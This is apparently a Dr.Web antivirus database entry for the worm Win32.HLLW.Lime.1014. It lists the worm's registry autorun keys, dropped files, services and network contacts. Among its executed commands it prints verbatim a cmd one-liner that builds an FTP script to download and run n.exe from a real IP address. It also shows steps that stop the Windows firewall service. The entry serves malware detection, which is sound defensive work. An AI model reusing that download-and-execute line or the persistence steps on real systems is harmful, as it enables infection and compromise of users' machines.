Um eine korrekte Funktionsweise unserer Website zu gewährleisten, müssen Sie die Unterstützung für JavaScript in Ihrem Browser aktivieren.
Win32.HLLW.Lime.1014
Added to the Dr.Web virus database:
2011-07-11
Virus description added:
2011-08-02
Technical Information
To ensure autorun and distribution:
Modifies the following registry keys:
[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'safe360' = '%CommonProgramFiles%\sebsbvx\coiome.exe'
Creates or modifies the following files:
%WINDIR%\Tasks\YXWb.exe
%WINDIR%\Tasks\YXWg.vbe
Creates the following services:
[<HKLM>\SYSTEM\ControlSet001\Services\LmHosts] 'Start' = '00000002'
[<HKLM>\SYSTEM\ControlSet001\Services\RpcLocator] 'Start' = '00000002'
[<HKLM>\SYSTEM\ControlSet001\Services\NtLmSsp] 'Start' = '00000002'
[<HKLM>\SYSTEM\ControlSet001\Services\Browser] 'Start' = '00000002'
[<HKLM>\SYSTEM\ControlSet001\Services\lanmanserver] 'Start' = '00000002'
[<HKLM>\SYSTEM\ControlSet001\Services\lanmanworkstation] 'Start' = '00000002'
Malicious functions:
Creates and executes the following:
%WINDIR%\Tasks\YXWb.exe 192.168.193.5 : 192.168.193.6 : 192.168.193.7 : 192.168.193.4 : 192.168.193.1 : 192.168.193.2 : 192.168.193.3 :
%CommonProgramFiles%\sebsbvx\coiome.exe
Executes the following:
<SYSTEM32>\net1.exe start RpcLocator
<SYSTEM32>\cscript.exe %WINDIR%\Tasks\YXWg.vbe 192.168.193.1 %USERNAME% "" "cmd /c @echo open 61.129.51.245>>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get n.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&n.exe&n.exe&del n.exe"
<SYSTEM32>\sc.exe delete JavaServe
<SYSTEM32>\net1.exe stop sharedaccess
<SYSTEM32>\net1.exe start LmHosts
<SYSTEM32>\locator.exe
<SYSTEM32>\attrib.exe -h -s -r -a "%HOMEPATH%\Cookies\*.*"
<SYSTEM32>\cscript.exe %WINDIR%\Tasks\YXWg.vbe 192.168.193.3 %USERNAME% "" "cmd /c @echo open 61.129.51.245>>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get n.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&n.exe&n.exe&del n.exe"
<SYSTEM32>\net1.exe start NtLmSsp
<SYSTEM32>\cscript.exe %WINDIR%\Tasks\YXWg.vbe 192.168.193.2 %USERNAME% "" "cmd /c @echo open 61.129.51.245>>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get n.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&n.exe&n.exe&del n.exe"
<SYSTEM32>\net1.exe start Browser
<SYSTEM32>\sc.exe config lanmanserver start= auto
<SYSTEM32>\sc.exe config lanmanworkstation start= auto
<SYSTEM32>\sc.exe config Browser start= auto
<SYSTEM32>\mshta.exe "%PROGRAM_FILES%\AHO.hta"
<SYSTEM32>\taskkill.exe /im coiome.exe /f
<SYSTEM32>\net1.exe start lanmanserver
<SYSTEM32>\net1.exe start lanmanworkstation
<SYSTEM32>\sc.exe config NtLmSsp start= auto
<SYSTEM32>\sc.exe config LmHosts start= auto
<SYSTEM32>\sc.exe config RpcLocator start= auto
Sets a new unauthorized home page for Windows Internet Explorer.
Modifies file system :
Creates the following files:
\Device\LanmanRedirector\192.168.193.2\pipe\browser
\Device\LanmanRedirector\192.168.193.1\pipe\browser
\Device\LanmanRedirector\192.168.193.4\pipe\browser
\Device\LanmanRedirector\192.168.193.3\pipe\browser
%CommonProgramFiles%\sebsbvx\coiome.exe
%PROGRAM_FILES%\AHO.hta
%WINDIR%\Fonts\oh.ini
%HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\69I9OPW5\b[1].jpg
Deletes itself.
Network activity:
Connects to:
'<Private IP address>':445
'<Private IP address>':135
'<Private IP address>':139
'localhost':1037
'j.###6800.com':80
'tj.##16800.com':80
TCP:
HTTP GET requests:
tj.##16800.com/t/Count.asp?ma#######################################
j.###6800.com/b.jpg
UDP:
DNS ASK tj.##16800.com
DNS ASK j.###6800.com
Miscellaneous:
Searches for the following windows:
ClassName: '' WindowName: ''
ClassName: 'Shell_TrayWnd' WindowName: ''
Laden Sie Dr.Web für Android herunter
Kostenlos für 3 Monate
Alle Schutzkomponenten
Verlängerung der Testversion über AppGallery/Google Pay
Wenn Sie diese Webseite weiter benutzen, bedeutet dies, dass Sie mit der Verarbeitung von Cookies sowie dem Einsatz anderer Technologien zur Sammlung von statistischen Nutzerdaten einverstanden sind. Mehr dazu
OK